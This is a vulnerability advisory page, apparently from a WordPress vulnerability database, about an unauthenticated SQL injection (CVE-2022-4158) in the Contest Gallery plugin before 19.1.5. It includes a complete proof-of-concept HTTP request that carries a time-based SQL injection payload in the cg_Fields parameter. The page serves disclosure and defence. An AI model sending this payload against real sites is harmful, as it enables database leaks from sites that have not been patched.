Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbDaniel KrohmerWPVDB-ID:1B3B51AF-AD73-4F8E-BA97-375B8A363B64
HistoryDec 05, 2022 - 12:00 a.m.

Contest Gallery < 19.1.5 - Unauthenticated SQL Injection

2022-12-0500:00:00
Daniel Krohmer
wpscan.com
8
wordpress
sql injection
unauthenticated

EPSS

0.002

Percentile

60.0%

JSON

The plugins do not escape the cg_Fields POST parameter before concatenating it to an SQL query in users-registry-check-registering-and-login.php. This may allow malicious visitors to leak sensitive information from the site’s database.

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------22204028416237992052154109961 Content-Length: 3796 Origin: http://localhost:8080 Connection: close Referer: http://localhost:8080/?p=1 Cookie: wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_current_page_id” 1 -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_check” 63e2eac15c3548881b7e582f807cb491fc9b8c0cb7a61631580a8db22fa29d70 -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“action” post_cg_registry -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_gallery_id_registry” 1 -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[1][Form_Input_ID]” 1//AND//(SELECT//7741//FROM/**/(SELECT(SLEEP(5)))hlAf) -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[1][Field_Type]” user-check-agreement-field -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[1][Field_Order]” 1 -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[1][Field_Content]” testing -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[2][Form_Input_ID]” 2 -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[2][Field_Type]” main-nick-name -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[2][Field_Order]” 1 -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[2][Field_Content]” testing -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[3][Form_Input_ID]” 3 -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[3][Field_Type]” main-mail -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[3][Field_Order]” 2 -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[3][Field_Content]” [email protected] -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[4][Form_Input_ID]” 4 -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[4][Field_Type]” password -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[4][Field_Order]” 3 -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[4][Field_Content]” testing -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[5][Form_Input_ID]” 5 -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[5][Field_Type]” password-confirm -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[5][Field_Order]” 4 -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg_Fields[5][Field_Content]” testing -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg-main-mail” [email protected] -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg-main-user-name” testing -----------------------------22204028416237992052154109961 Content-Disposition: form-data; name=“cg-main-nick-name” testing -----------------------------22204028416237992052154109961–

Related

cvelist 1
nvd 1
cve 1
prion 1
wpexploit 1
cvelist
cvelist
CVE-2022-4158 Contest Gallery < 19.1.5 - Unauthenticated SQL Injection
2022-12-26 12:28:02
nvd
nvd
CVE-2022-4158
2022-12-26 13:15:13
cve
cve
CVE-2022-4158
2022-12-26 13:15:13
prion
prion
Cross site request forgery (csrf)
2022-12-26 13:15:00
wpexploit
wpexploit
Contest Gallery < 19.1.5 - Unauthenticated SQL Injection
2022-12-05 00:00:00

EPSS

0.002

Percentile

60.0%

JSON
Related for WPVDB-ID:1B3B51AF-AD73-4F8E-BA97-375B8A363B64
cvelist1nvd1cve1prion1wpexploit1